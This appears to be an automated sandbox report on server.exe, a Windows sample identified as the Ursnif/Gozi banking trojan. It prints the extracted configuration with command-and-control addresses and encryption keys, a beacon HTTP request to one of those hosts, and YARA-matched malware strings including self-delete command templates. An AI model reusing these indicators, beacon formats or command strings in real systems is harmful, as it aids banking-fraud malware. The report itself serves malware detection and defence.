Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:825996
MD5:bfe5c79a11ef437d401fe8a27ea49372
SHA1:bd04d26776c766934f0acd2885cf97168dc5bbfb
SHA256:881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 6020 cmdline: C:\Users\user\Desktop\server.exe MD5: BFE5C79A11EF437D401FE8A27EA49372)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x58a1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    Click to see the 27 entries
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: server.exeReversingLabs: Detection: 38%
    Source: server.exeVirustotal: Detection: 50%Perma Link
    Source: server.exeJoe Sandbox ML: detected
    Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
    Source: 00000000.00000003.244409614.0000000000790000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

    Compliance

    barindex
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: global trafficHTTP traffic detected: GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://62.173
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/
    Source: server.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/b
    Source: server.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2B
    Source: unknownDNS traffic detected: queries for: checklist.skype.com
    Source: global trafficHTTP traffic detected: GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: server.exe, 00000000.00000002.509818085.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

    System Summary

    barindex
    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
